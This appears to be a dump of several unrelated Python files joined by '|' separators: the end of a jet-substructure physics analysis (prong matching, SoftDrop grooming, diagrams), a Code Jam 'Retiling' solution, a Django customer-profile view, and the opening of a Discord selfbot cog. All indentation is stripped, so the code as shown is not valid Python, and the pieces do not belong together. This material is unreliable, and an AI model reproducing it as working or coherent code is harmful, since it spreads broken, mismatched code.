if self.debug_level > 1:
print('Number of det-level jets: {}'.format(len(jets_combined_selected)))
# Loop through jets and set jet matching candidates (based on deltaR) for each jet in user_info
[[self.set_matching_candidates(jet_combined, jet_truth, jetR,
'hDeltaR_R{{}}_Rmax{}'.format(R_max)) for jet_truth in jets_truth_selected]
for jet_combined in jets_combined_selected]
# Loop through jets and set accepted matches
hname = 'hJetMatchingQA_R{}_Rmax{}'.format(jetR, R_max)
[self.set_matches_AA_truth(jet_combined, jetR, hname) for jet_combined in jets_combined_selected]
# Loop through jets and fill delta-pt histograms
result = [self.fill_matching_histograms(jet_combined, jetR, R_max) for jet_combined in jets_combined_selected]
# Loop through jets and fill groomed histograms if both det and truth jets are unique match
for grooming_setting in self.grooming_settings:
if self.debug_level > 1:
print('grooming setting: {}'.format(grooming_setting))
result = [self.fill_groomed_jet_matches(grooming_setting, jet_combined, i_jet, jetR, R_max) for i_jet, jet_combined in enumerate(jets_combined_selected)]
#---------------------------------------------------------------
# Loop through jets and fill matching histos
#---------------------------------------------------------------
def fill_matching_histograms(self, jet_combined, jetR, R_max):
if jet_combined.has_user_info():
jet_truth = jet_combined.python_info().match
if jet_truth:
# Fill delta pt
delta_pt = (jet_combined.pt() - jet_truth.pt())
getattr(self, 'hDeltaPt_emb_R{}_Rmax{}'.format(jetR, R_max)).Fill(jet_truth.pt(), delta_pt)
# Fill subjet histograms
if 'subjet_z' in self.observable_list:
for subjetR in self.obs_settings['subjet_z']:
self.fill_subjet_histograms(jet_combined, jet_truth, jetR, subjetR, R_max)
#---------------------------------------------------------------
# Fill subjet histograms
#---------------------------------------------------------------
def fill_subjet_histograms(self, jet_combined, jet_truth, jetR, subjetR, R_max):
# Find subjets
cs_subjet_combined = fj.ClusterSequence(jet_combined.constituents(), self.subjet_def[subjetR])
subjets_combined = fj.sorted_by_pt(cs_subjet_combined.inclusive_jets())
cs_subjet_truth = fj.ClusterSequence(jet_truth.constituents(), self.subjet_def[subjetR])
subjets_truth = fj.sorted_by_pt(cs_subjet_truth.inclusive_jets())
# Find leading subjets and fill matched pt
leading_subjet_combined = self.leading_subjet(subjets_combined)
leading_subjet_truth = self.leading_subjet(subjets_truth)
z_leading_combined = leading_subjet_combined.pt() / jet_combined.pt()
matched_pt = fjtools.matched_pt(leading_subjet_combined, leading_subjet_truth)
name = 'h_subjet_z_fraction_leading_JetPt_R{}_{}_Rmax{}'.format(jetR, subjetR, R_max)
getattr(self, name).Fill(jet_truth.pt(), z_leading_combined, matched_pt)
# Set subjet matches
# Beware that defining geometrical subjet matches highly constrains them to match by pt
# Loop through subjets and set jet matching candidates (based on deltaR) for each jet in user_info
[[self.set_matching_candidates(subjet_combined, subjet_truth, subjetR,
'hDeltaR_subjet_z_R{}_{{}}_Rmax{}'.format(jetR, R_max)) for subjet_truth in subjets_truth]
for subjet_combined in subjets_combined]
# Loop through subjets and set accepted matches
hname = 'hJetMatchingQA_R{}_Rmax{}'.format(jetR, R_max)
[self.set_matches_AA_truth(subjet_combined, subjetR, hname) for subjet_combined in subjets_combined]
# Loop through matches and fill histograms
for subjet_combined in subjets_combined:
if subjet_combined.has_user_info():
subjet_truth = subjet_combined.python_info().match
if subjet_truth:
z_truth = subjet_truth.pt() / jet_truth.pt()
# Compute fraction of pt of truth subjet contained in matched combined subjet
matched_pt = fjtools.matched_pt(subjet_combined, subjet_truth)
name = 'h_subjet_z_fraction_JetPt_R{}_{}_Rmax{}'.format(jetR, subjetR, R_max)
getattr(self, name).Fill(jet_truth.pt(), z_truth, matched_pt)
#---------------------------------------------------------------
# Loop through jets and fill response if both det and truth jets are unique match
#---------------------------------------------------------------
def leading_subjet(self, subjets):
leading_subjet = None
for subjet in subjets:
if not leading_subjet:
leading_subjet = subjet
if subjet.pt() > leading_subjet.pt():
leading_subjet = subjet
return leading_subjet
#---------------------------------------------------------------
# Loop through jets and fill response if both det and truth jets are unique match
#---------------------------------------------------------------
def fill_groomed_jet_matches(self, grooming_setting, jet_combined, i_jet, jetR, R_max):
grooming_label = self.utils.grooming_label(grooming_setting)
if jet_combined.has_user_info():
jet_truth = jet_combined.python_info().match
if jet_truth:
jet_pt_combined_ungroomed = jet_combined.pt()
jet_pt_truth_ungroomed = jet_truth.pt()
if self.debug_level > 2:
print('**** jet_pt_combined_ungroomed: {}, jet_pt_truth_ungroomed: {}'.format(jet_pt_combined_ungroomed, jet_pt_truth_ungroomed))
# Groom combined jet
gshop_combined = fjcontrib.GroomerShop(jet_combined, jetR, self.reclustering_algorithm)
jet_combined_groomed_lund = self.utils.groom(gshop_combined, grooming_setting, jetR)
if not jet_combined_groomed_lund:
return
# Groom truth jet
gshop_truth = fjcontrib.GroomerShop(jet_truth, jetR, self.reclustering_algorithm)
jet_truth_groomed_lund = self.utils.groom(gshop_truth, grooming_setting, jetR)
if not jet_truth_groomed_lund:
return
# Fill some variables
theta_g_combined = jet_combined_groomed_lund.Delta()/jetR
theta_g_truth = jet_truth_groomed_lund.Delta()/jetR
zg_combined = jet_combined_groomed_lund.z()
zg_truth = jet_truth_groomed_lund.z()
if 'kappa' in self.observable_list:
kappa_combined = self.kappa(zg_combined, theta_g_combined)
kappa_truth = self.kappa(zg_truth, theta_g_truth)
if 'tf' in self.observable_list:
tf_combined = self.tf(zg_combined, theta_g_combined)
tf_truth = self.tf(zg_truth, theta_g_truth)
# Fill prong matching histograms
if grooming_setting in self.obs_grooming_settings['theta_g']:
prong_match = self.fill_prong_matching_histograms(jet_truth, jet_truth_groomed_lund, jet_combined, jet_combined_groomed_lund, jet_pt_truth_ungroomed, jetR, grooming_setting, grooming_label, R_max)
# Plot diagram
if self.plot_diagram:
self.diagram(jet_truth, jet_combined, prong_match, i_jet, grooming_setting, jetR)
# Fill combined histograms
hname = 'h_theta_g_zg_JetPt_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)
x = ([jet_pt_truth_ungroomed, zg_combined, theta_g_combined, prong_match])
x_array = array('d', x)
getattr(self, hname).Fill(x_array)
if 'kappa' in self.observable_list:
hname = 'h_kappa_JetPt_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)
getattr(self, hname).Fill(jet_pt_truth_ungroomed, kappa_combined, prong_match)
if 'tf' in self.observable_list:
hname = 'h_tf_JetPt_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)
getattr(self, hname).Fill(jet_pt_truth_ungroomed, tf_combined, prong_match)
# Fill truth histograms
if self.fill_Rmax_indep_hists:
hname = 'h_theta_g_zg_JetPt_Truth_R{}_{}'.format(jetR, grooming_label)
getattr(self, hname).Fill(jet_pt_truth_ungroomed, zg_truth, theta_g_truth)
if 'kappa' in self.observable_list:
hname = 'h_kappa_JetPt_Truth_R{}_{}'.format(jetR, grooming_label)
getattr(self, hname).Fill(jet_pt_truth_ungroomed, kappa_truth)
if 'tf' in self.observable_list:
hname = 'h_tf_JetPt_Truth_R{}_{}'.format(jetR, grooming_label)
getattr(self, hname).Fill(jet_pt_truth_ungroomed, tf_truth)
# Fill tree
if self.fill_tree:
if R_max == self.main_R_max:
if grooming_setting == self.grooming_settings[0]:
self.tw.fill_branch('R{}_jet_pt_truth_ungroomed'.format(jetR), jet_pt_truth_ungroomed)
self.tw.fill_branch('R{}_jet_pt_combined_ungroomed'.format(jetR), jet_pt_combined_ungroomed)
label = 'R{}_Rmax{}_{}'.format(jetR, R_max, grooming_label)
jet_combined_groomed = jet_combined_groomed_lund.pair()
jet_pt_combined_groomed = jet_combined_groomed.pt()
self.tw.fill_branch('{}_jet_pt_combined_groomed'.format(label), jet_pt_combined_groomed)
self.tw.fill_branch('{}_zg_combined'.format(label), zg_combined)
self.tw.fill_branch('{}_theta_g_combined'.format(label), theta_g_combined)
self.tw.fill_branch('{}_prong_matching_flag'.format(label), prong_match)
#---------------------------------------------------------------
# Plot diagram
#---------------------------------------------------------------
def diagram(self, jet_truth, jet_combined, prong_match, i_jet, grooming_setting, jetR):
if jet_truth.pt() < 40 or jet_truth.pt() > 100:
return
# Groom truth jet, and get list of all Lund splits
gshop_truth = fjcontrib.GroomerShop(jet_truth, jetR, self.reclustering_algorithm)
jet_truth_groomed_lund = self.utils.groom(gshop_truth, grooming_setting, jetR)
jet_truth_lunds = gshop_truth.lund_splits()
if not jet_truth_lunds:
return
# Loop through Lund splits, and draw diagram
self.single_diagram(jet_truth, jet_truth_lunds, jet_pt=jet_truth.pt(),
i_jet=i_jet, label='truth')
# Groom combined jet, and get list of all Lund splits
gshop_combined = fjcontrib.GroomerShop(jet_combined, jetR, self.reclustering_algorithm)
jet_combined_groomed_lund = self.utils.groom(gshop_combined, grooming_setting, jetR)
jet_combined_lunds = gshop_combined.lund_splits()
if not jet_combined_lunds:
return
# Loop through Lund splits, and draw diagram
self.single_diagram(jet_combined, jet_combined_lunds, jet_pt=jet_truth.pt(),
i_jet=i_jet, prong_match=prong_match, label='combined')
# 1: subleading
# 2: leading, swap (>10% of leading in subleading)
# 3: leading, mis-tag (<10% of leading in subleading)
# 4: ungroomed
# 5: outside
# 6: other (i.e. 50% is not in any of the above)
# 7: pp-truth passed grooming, but combined jet failed grooming
# 8: combined jet passed grooming, but pp-truth failed grooming
# 9: both pp-truth and combined jet failed SoftDrop
#---------------------------------------------------------------
# Plot diagram
#---------------------------------------------------------------
def single_diagram(self, jet, jet_lunds, jet_pt=0., i_jet=-1, prong_match='', label=''):
# Plot settings
linewidth=3.
color_pythia = sns.xkcd_rgb['denim blue']
color_thermal = sns.xkcd_rgb['pale red']
color_primary = sns.xkcd_rgb['grey']
ymin = 0.98
ymax = 1.08
# Loop through primary Lund plane
delta = 0.7/len(jet_lunds)
found_split = False
for i, split in enumerate(jet_lunds):
pt = split.pair().pt()
z = split.z()
dr = split.Delta()
# Draw softer splitting
length = pt*z / jet_pt
x = [delta*(i+1), delta*(i+1) + length*np.cos(dr)]
y = [1, 1 + length*np.sin(dr)]
plt.plot(x, y, color_pythia, linewidth=linewidth, label=('PYTHIA' if (i==0 and label != 'truth') else '_'))
# Draw fraction of splitting from background
prong = split.softer()
prong_pt = prong.pt()
matched_pt = 0.
for p in prong.constituents():
if p.user_index() >= 0:
matched_pt += p.pt()
length *= 1 - matched_pt/prong_pt
x = [delta*(i+1), delta*(i+1) + length*np.cos(dr)]
y = [1, 1 + length*np.sin(dr)]
if length > 1e-3:
plt.plot(x, y, color_thermal, linewidth=linewidth, label=('Background' if i==0 else '_'))
# Identify first splitting passing SD condition
if not found_split:
if z > 0.1:
found_split = True
x_split = [x[0], x[0]]
y_split = [y[0], y[0]]
# Draw leading branch
x = [0, 1]
y = [1, 1]
plt.plot(x, y, color_primary, linewidth=linewidth+1.2)
if found_split:
if prong_match in [1, 2, '']:
plt.plot(x_split, y_split, color_pythia, marker='o', markersize=12)
elif prong_match in [3,4,5,6]:
plt.plot(x_split, y_split, color_thermal, marker='o', markersize=12)
# Draw main legend
pt_label = r'$p_{{\mathrm{{T,jet}}}} = {:.0f} \;\mathrm{{GeV}}/c$'.format(jet_pt)
reclustering_label = '{} reclustering'.format(self.recluster_alg)
grooming_label = r'Soft Drop $z_{\mathrm{cut}}=0.1$'
if label == 'truth':
title = '{} \n{} \n{} \n{}'.format(r'$\bf{{pp}}$', grooming_label,
reclustering_label, pt_label)
else:
title = '{} \n{} \n{} \n{}'.format(r'$\bf{{pp + thermal}}$', grooming_label,
reclustering_label, pt_label)
first_legend = plt.legend(title = title, title_fontsize=15,
loc='upper right', fontsize=12)
ax = plt.gca().add_artist(first_legend)
axes = plt.gca()
axes.set_ylim([ymin, ymax])
plt.savefig(os.path.join(self.output_dir, 'diagram_ev{}_jet{}_{}{}.pdf'.format(self.event_number, i_jet, label, prong_match)))
plt.close('all')
#---------------------------------------------------------------
# Do prong-matching
#---------------------------------------------------------------
def fill_prong_matching_histograms(self, jet_truth, jet_truth_groomed_lund, jet_combined, jet_combined_groomed_lund, jet_pt_truth_ungroomed, jetR, grooming_setting, grooming_label, R_max):
# Dynamical grooming returns a fjcontrib::LundGenerator
# The prongs can be retrieved directly from this object.
# If the object exists, then it has passed grooming
jet_truth_prong1 = jet_truth_groomed_lund.harder()
jet_truth_prong2 = jet_truth_groomed_lund.softer()
# Get prongs of combined jet
jet_combined_prong1 = jet_combined_groomed_lund.harder()
jet_combined_prong2 = jet_combined_groomed_lund.softer()
# Get the fastjet::PseudoJets from the fjcontrib::LundGenerators
jet_truth_groomed = jet_truth_groomed_lund.pair()
jet_combined_groomed = jet_combined_groomed_lund.pair()
has_parents_truth = jet_truth_groomed.has_constituents()
has_parents_combined = jet_combined_groomed.has_constituents()
# Check that groomed truth jet doesn't contain any background tracks
problem = False
if has_parents_truth:
for constituent in jet_truth_groomed.constituents():
if constituent.user_index() < 0:
problem = True
if problem:
print(grooming_setting)
print(dir(jet_truth_groomed_lund))
print('pair: {}'.format(jet_truth_groomed_lund.pair()))
print('kappa: {}'.format(jet_truth_groomed_lund.kappa()))
print('groomed constituents: {}'.format([track.user_index() for track in jet_truth_groomed.constituents()]))
print('jet constituents: {}'.format([track.user_index() for track in jet_truth.constituents()]))
print('prong1 constituents: {}'.format([track.user_index() for track in jet_truth_prong1.constituents()]))
print('prong2 constituents: {}'.format([track.user_index() for track in jet_truth_prong2.constituents()]))
if self.debug_level > 1:
if jet_pt_truth_ungroomed > 80.:
print('=======================================================')
print(type)
print('jet_pt_truth_ungroomed: {}'.format(jet_pt_truth_ungroomed))
print('jet_pt_truth_groomed: {}'.format(jet_truth_groomed.pt()))
print('jet_pt_combined_groomed: {}'.format(jet_combined_groomed.pt()))
print('')
print('jet_truth tracks: {}'.format([track.user_index() for track in jet_truth.constituents()]))
print(' track pt: {}'.format([np.around(track.pt(),2) for track in jet_truth.constituents()]))
if jet_truth_groomed.has_constituents():
print('jet_truth_groomed tracks: {}'.format([track.user_index() for track in jet_truth_groomed.constituents()]))
print(' track pt: {}'.format([np.around(track.pt(),2) for track in jet_truth_groomed.constituents()]))
if jet_combined_groomed.has_constituents():
print('jet_combined groomed tracks: {}'.format([track.user_index() for track in jet_combined_groomed.constituents()]))
print(' track pt: {}'.format([np.around(track.pt(),2) for track in jet_combined_groomed.constituents()]))
if jet_combined.has_constituents():
print('jet_combined ungroomed tracks: {}'.format([track.user_index() for track in jet_combined.constituents()]))
print(' track pt: {}'.format([np.around(track.pt(),2) for track in jet_combined.constituents()]))
# Compute fraction of pt of the pp-truth prong tracks that is contained in the combined-jet prong,
# in order to have a measure of whether the combined-jet prong is the "same" prong as the pp-truth prong
deltaR_prong1 = -1.
deltaR_prong2 = -1.
deltaZ = -1.
rg_truth = -1.
zg_truth = -1.
if has_parents_truth and has_parents_combined:
# Subleading jet pt-matching
# --------------------------
# (1) Fraction of pt matched: subleading pp-det in subleading combined
matched_pt_subleading_subleading = fjtools.matched_pt(jet_combined_prong2, jet_truth_prong2)
# (2) Fraction of pt matched: subleading pp-det in leading combined
matched_pt_subleading_leading = fjtools.matched_pt(jet_combined_prong1, jet_truth_prong2)
# (3) Fraction of pt matched: subleading pp-det in ungroomed combined jet
matched_pt_subleading_groomed = fjtools.matched_pt(jet_combined_groomed, jet_truth_prong2)
matched_pt_subleading_ungroomed = fjtools.matched_pt(jet_combined, jet_truth_prong2)
matched_pt_subleading_ungroomed_notgroomed = matched_pt_subleading_ungroomed - matched_pt_subleading_groomed
# (4) Fraction of pt matched: subleading pp-det not in ungroomed combined jet
matched_pt_subleading_outside = 1 - matched_pt_subleading_ungroomed
# Leading jet pt-matching
# --------------------------
# (1) Fraction of pt matched: leading pp-det in subleading combined
matched_pt_leading_subleading = fjtools.matched_pt(jet_combined_prong2, jet_truth_prong1)
# (2) Fraction of pt matched: leading pp-det in leading combined
matched_pt_leading_leading = fjtools.matched_pt(jet_combined_prong1, jet_truth_prong1)
# (3) Fraction of pt matched: leading pp-det in ungroomed combined jet
matched_pt_leading_groomed = fjtools.matched_pt(jet_combined_groomed, jet_truth_prong1)
matched_pt_leading_ungroomed = fjtools.matched_pt(jet_combined, jet_truth_prong1)
matched_pt_leading_ungroomed_notgroomed = matched_pt_leading_ungroomed - matched_pt_leading_groomed
# (4) Fraction of pt matched: leading pp-det not in ungroomed combined jet
matched_pt_leading_outside = 1 - matched_pt_leading_ungroomed
# Compute delta-R between pp-det prong and combined prong
# --------------------------
deltaR_prong1 = jet_combined_prong1.delta_R(jet_truth_prong1)
deltaR_prong2 = jet_combined_prong2.delta_R(jet_truth_prong2)
deltaZ = jet_combined_groomed_lund.z() - jet_truth_groomed_lund.z()
rg_truth = jet_truth_groomed_lund.Delta()
zg_truth = jet_truth_groomed_lund.z()
if self.debug_level > 3:
if rg_truth < 0.:
print(rg_truth)
if self.debug_level > 1:
if jet_pt_truth_ungroomed > 80.:
print('subleading prong tracks -- combined: {}'.format([track.user_index() for track in jet_combined_prong2.constituents()]))
print('subleading prong tracks -- pp-truth: {}'.format([track.user_index() for track in jet_truth_prong2.constituents()]))
print('leading prong tracks -- combined: {}'.format([track.user_index() for track in jet_combined_prong1.constituents()]))
print('leading prong tracks -- pp-truth: {}'.format([track.user_index() for track in jet_truth_prong1.constituents()]))
print('')
print('leading_prong_pt: {}'.format(jet_combined_prong1.pt()))
print('matched_pt_leading_subleading fraction: {}'.format(matched_pt_leading_subleading))
print('matched_pt_leading_leading fraction: {}'.format(matched_pt_leading_leading))
print('matched_pt_leading_ungroomed_notgroomed fraction: {}'.format(matched_pt_leading_ungroomed_notgroomed))
print('matched_pt_leading_outside fraction: {}'.format(matched_pt_leading_outside))
print('')
print('subleading_prong_pt: {}'.format(jet_combined_prong2.pt()))
print('matched_pt_subleading_subleading fraction: {}'.format(matched_pt_subleading_subleading))
print('matched_pt_subleading_leading fraction: {}'.format(matched_pt_subleading_leading))
print('matched_pt_subleading_ungroomed_notgroomed fraction: {}'.format(matched_pt_subleading_ungroomed_notgroomed))
print('matched_pt_subleading_outside fraction: {}'.format(matched_pt_subleading_outside))
print('')
print('deltaR_prong1: {}'.format(deltaR_prong1))
print('deltaR_prong2: {}'.format(deltaR_prong2))
elif has_parents_truth: # pp-truth passed grooming, but combined jet failed grooming
matched_pt_leading_leading = matched_pt_leading_subleading = matched_pt_leading_ungroomed_notgroomed = matched_pt_leading_outside = matched_pt_subleading_leading = matched_pt_subleading_subleading = matched_pt_subleading_ungroomed_notgroomed = matched_pt_subleading_outside = -0.1
elif has_parents_combined: # combined jet passed grooming, but pp-det failed grooming
matched_pt_leading_leading = matched_pt_leading_subleading = matched_pt_leading_ungroomed_notgroomed = matched_pt_leading_outside = matched_pt_subleading_leading = matched_pt_subleading_subleading = matched_pt_subleading_ungroomed_notgroomed = matched_pt_subleading_outside = -0.2
else: # both pp-det and combined jet failed SoftDrop
matched_pt_leading_leading = matched_pt_leading_subleading = matched_pt_leading_ungroomed_notgroomed = matched_pt_leading_outside = matched_pt_subleading_leading = matched_pt_subleading_subleading = matched_pt_subleading_ungroomed_notgroomed = matched_pt_subleading_outside = -0.3
# Leading prong
getattr(self, 'hProngMatching_leading_leading_JetPt_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_pt_truth_ungroomed, matched_pt_leading_leading, deltaR_prong1/rg_truth)
getattr(self, 'hProngMatching_leading_subleading_JetPt_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_pt_truth_ungroomed, matched_pt_leading_subleading, deltaR_prong1/rg_truth)
getattr(self, 'hProngMatching_leading_ungroomed_JetPt_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_pt_truth_ungroomed, matched_pt_leading_ungroomed_notgroomed, deltaR_prong1/rg_truth)
getattr(self, 'hProngMatching_leading_outside_JetPt_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_pt_truth_ungroomed, matched_pt_leading_outside, deltaR_prong1/rg_truth)
getattr(self, 'hProngMatching_leading_leading_JetPtZ_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_pt_truth_ungroomed, matched_pt_leading_leading, deltaZ/zg_truth)
getattr(self, 'hProngMatching_leading_subleading_JetPtZ_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_pt_truth_ungroomed, matched_pt_leading_subleading, deltaZ/zg_truth)
getattr(self, 'hProngMatching_leading_ungroomed_JetPtZ_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_pt_truth_ungroomed, matched_pt_leading_ungroomed_notgroomed, deltaZ/zg_truth)
getattr(self, 'hProngMatching_leading_outside_JetPtZ_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_pt_truth_ungroomed, matched_pt_leading_outside, deltaZ/zg_truth)
# Subleading prong
getattr(self, 'hProngMatching_subleading_leading_JetPt_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_pt_truth_ungroomed, matched_pt_subleading_leading, deltaR_prong2/rg_truth)
getattr(self, 'hProngMatching_subleading_subleading_JetPt_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_pt_truth_ungroomed, matched_pt_subleading_subleading, deltaR_prong2/rg_truth)
getattr(self, 'hProngMatching_subleading_ungroomed_JetPt_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_pt_truth_ungroomed, matched_pt_subleading_ungroomed_notgroomed, deltaR_prong2/rg_truth)
getattr(self, 'hProngMatching_subleading_outside_JetPt_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_pt_truth_ungroomed, matched_pt_subleading_outside, deltaR_prong2/rg_truth)
getattr(self, 'hProngMatching_subleading_leading_JetPtZ_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_pt_truth_ungroomed, matched_pt_subleading_leading, deltaZ/zg_truth)
getattr(self, 'hProngMatching_subleading_subleading_JetPtZ_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_pt_truth_ungroomed, matched_pt_subleading_subleading, deltaZ/zg_truth)
getattr(self, 'hProngMatching_subleading_ungroomed_JetPtZ_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_pt_truth_ungroomed, matched_pt_subleading_ungroomed_notgroomed, deltaZ/zg_truth)
getattr(self, 'hProngMatching_subleading_outside_JetPtZ_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_pt_truth_ungroomed, matched_pt_subleading_outside, deltaZ/zg_truth)
# Plot correlation of matched pt fraction for leading-subleading and subleading-leading
getattr(self, 'hProngMatching_subleading-leading_correlation_JetPt_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_truth.pt(), matched_pt_leading_subleading, matched_pt_subleading_leading)
# Plot fraction of groomed pp truth pt that is contained in groomed combined jet
if has_parents_truth and has_parents_combined:
matched_pt_truth_groomed = fjtools.matched_pt(jet_combined_groomed, jet_truth_groomed)
getattr(self, 'hProngMatching_truth_groomed_JetPt_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_pt_truth_ungroomed, matched_pt_truth_groomed)
matched_pt_truth2_groomed = fjtools.matched_pt(jet_combined_groomed, jet_truth_prong2)
getattr(self, 'hProngMatching_truth2_groomed_JetPt_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_pt_truth_ungroomed, matched_pt_truth2_groomed)
# Plot initial fraction of subleading truth prong pt in combined ungroomed prong
# To do...
# Return flag based on where >50% of subleading matched pt resides:
# 1: subleading
# 2: leading, swap (>10% of leading in subleading)
# 3: leading, mis-tag (<10% of leading in subleading)
# 4: ungroomed
# 5: outside
# 6: other (i.e. 50% is not in any of the above)
# 7: pp-truth passed grooming, but combined jet failed grooming
# 8: combined jet passed grooming, but pp-truth failed grooming
# 9: both pp-truth and combined jet failed SoftDrop
if matched_pt_subleading_subleading > self.prong_matching_threshold:
return 1
elif matched_pt_subleading_leading > self.prong_matching_threshold:
if matched_pt_leading_subleading > 0.1:
return 2
else:
return 3
elif matched_pt_subleading_ungroomed_notgroomed > self.prong_matching_threshold:
return 4
elif matched_pt_subleading_outside > self.prong_matching_threshold:
return 5
elif matched_pt_leading_leading >= 0.:
return 6
elif matched_pt_leading_leading == -0.1:
return 7
elif matched_pt_leading_leading == -0.2:
return 8
elif matched_pt_leading_leading == -0.3:
return 9
else:
print('Warning -- flag not specified!')
return -1
#---------------------------------------------------------------
# Compute kappa
#---------------------------------------------------------------
def kappa(self, z, theta):
return z*theta
#---------------------------------------------------------------
# Compute tf
#---------------------------------------------------------------
def tf(self, z, theta):
return z*theta*theta
##################################################################
if __name__ == '__main__':
# Define arguments
parser = argparse.ArgumentParser(description='Process MC')
parser.add_argument('-f', '--inputFile', action='store',
type=str, metavar='inputFile',
default='AnalysisResults.root',
help='Path of ROOT file containing TTrees')
parser.add_argument('-c', '--configFile', action='store',
type=str, metavar='configFile',
default='config/analysis_config.yaml',
help="Path of config file for analysis")
parser.add_argument('-o', '--outputDir', action='store',
type=str, metavar='outputDir',
default='./TestOutput',
help='Output directory for output to be written to')
# Parse the arguments
args = parser.parse_args()
print('Configuring...')
print('inputFile: \'{0}\''.format(args.inputFile))
print('configFile: \'{0}\''.format(args.configFile))
  print('outputDir: \'{0}\''.format(args.outputDir))
# If invalid inputFile is given, exit
if not os.path.exists(args.inputFile):
print('File \"{0}\" does not exist! Exiting!'.format(args.inputFile))
sys.exit(0)
# If invalid configFile is given, exit
if not os.path.exists(args.configFile):
print('File \"{0}\" does not exist! Exiting!'.format(args.configFile))
sys.exit(0)
analysis = ProcessGroomers(input_file=args.inputFile, config_file=args.configFile, output_dir=args.outputDir)
analysis.process_groomers()
|
# Copyright (c) 2021 kamyu. All rights reserved.
#
# Google Code Jam 2021 Round 2 - Problem D. Retiling
# https://codingcompetitions.withgoogle.com/codejam/round/0000000000435915/00000000007dc2de
#
# Time: O((R * C)^3)
# Space: O((R * C)^2)
#
# Template translated from:
# https://github.com/kth-competitive-programming/kactl/blob/main/content/graph/WeightedMatching.h
# Time: O(N^2 * M)
# Space: O(N + M)
def hungarian(a):
if not a:
return 0, []
n, m = len(a)+1, len(a[0])+1
u, v, p, ans = [0]*n, [0]*m, [0]*m, [0]*(n-1)
for i in xrange(1, n):
p[0] = i
j0 = 0 # add "dummy" worker 0
dist, pre = [float("inf")]*m, [-1]*m
done = [False]*(m+1)
while True: # dijkstra
done[j0] = True
i0, j1, delta = p[j0], None, float("inf")
for j in xrange(1, m):
if done[j]:
continue
cur = a[i0-1][j-1]-u[i0]-v[j]
if cur < dist[j]:
dist[j], pre[j] = cur, j0
if dist[j] < delta:
delta, j1 = dist[j], j
for j in xrange(m):
if done[j]:
u[p[j]] += delta
v[j] -= delta
else:
dist[j] -= delta
j0 = j1
if not p[j0]:
break
while j0: # update alternating path
j1 = pre[j0]
p[j0], j0 = p[j1], j1
for j in xrange(1, m):
if p[j]:
ans[p[j]-1] = j-1
return -v[0], ans # min cost
def retiling():
R, C, F, S = map(int, raw_input().strip().split())
src, dst = [[raw_input().strip() for _ in xrange(R)] for _ in xrange(2)]
pos0 = [(i, j) for i in xrange(R) for j in xrange(C) if src[i][j] == 'M']
pos1 = [(i, j) for i in xrange(R) for j in xrange(C) if dst[i][j] == 'M']
cost = [[0]*(len(pos0)+len(pos1)) for _ in xrange(len(pos0)+len(pos1))]
for i in xrange(len(cost)):
for j in xrange(len(cost[0])):
if i < len(pos0) and j < len(pos1):
cost[i][j] = S * (abs(pos0[i][0]-pos1[j][0])+abs(pos0[i][1]-pos1[j][1]))
elif i < len(pos0) or j < len(pos1):
cost[i][j] = F
return hungarian(cost)[0]
for case in xrange(input()):
print 'Case #%d: %s' % (case+1, retiling())
|
from django.shortcuts import render
from django.http import HttpResponse
from website import forms
from website.models import Customer, Order, Product
from django.contrib.auth.models import User
def index(request):
context = dict()
if ("userID" in request.session) and (request.session["userID"] != "anon"):
userID = request.session["userID"]
categories = Product.objects.values("product_category").distinct()
customer = Customer.objects.values(
"customer_username",
"customer_first",
"customer_last",
"customer_email",
"customer_address",
"customer_telephone"
).filter(
customer_id__exact=userID
)
order = Order.objects.values(
"order_id",
"order_product_id_quantity_json",
"order_date",
"order_shipped",
"order_delivered",
"order_charged",
"order_payed",
"order_last_4_credit"
).filter(
order_customer_id__exact=userID
)
context["customer"] = customer
context["orders"] = order
context["categories"] = categories
return render(request, 'user/user.html', context)
def updateUser(request):
try:
username = request.POST['username']
email = request.POST['email']
firstName = request.POST['first']
lastName = request.POST['last']
address = request.POST['address']
telephone = request.POST['telephone']
f = forms.updateUserInfoForm({'username': username, 'email': email, 'firstName': firstName, 'lastName': lastName, 'address': address, 'telephone': telephone})
if f.is_valid():
# update user
user = User.objects.get(pk=request.session['userID'])
user.username = username
user.email = email
user.save()
# update customer
customer = Customer.objects.get(pk=request.session['userID'])
customer.customer_username = username
customer.customer_first = firstName
customer.customer_last = lastName
customer.customer_email = email
customer.customer_address = address
customer.customer_telephone = telephone
customer.save()
return HttpResponse("saved!")
except Exception as e:
return HttpResponse(e)
|
#
# cogs/info/core.py
#
# mawabot - Maware's selfbot
# Copyright (c) 2017 Ma-wa-re, Ammon Smith
#
# mawabot is available free of charge under the terms of the MIT
# License. You are free to redistribute and/or modify it under those
# terms. It is distributed in the hopes that it will be useful, but
# WITHOUT ANY WARRANTY. See the LICENSE file for more details.
#
''' Has several commands that get miscellaneous pieces of information '''
from datetime import datetime
import bisect
import time
import astral
import discord
from discord.ext import commands
__all__ = [
'General',
]
class General:
__slots__ = (
'bot',
'astral',
'zodiac',
'moon_phases',
)
def __init__(self, bot):
self.bot = bot
self.astral = astral.Astral()
self.zodiac = (
(120, '\N{CAPRICORN}'),
(218, '\N{AQUARIUS}'),
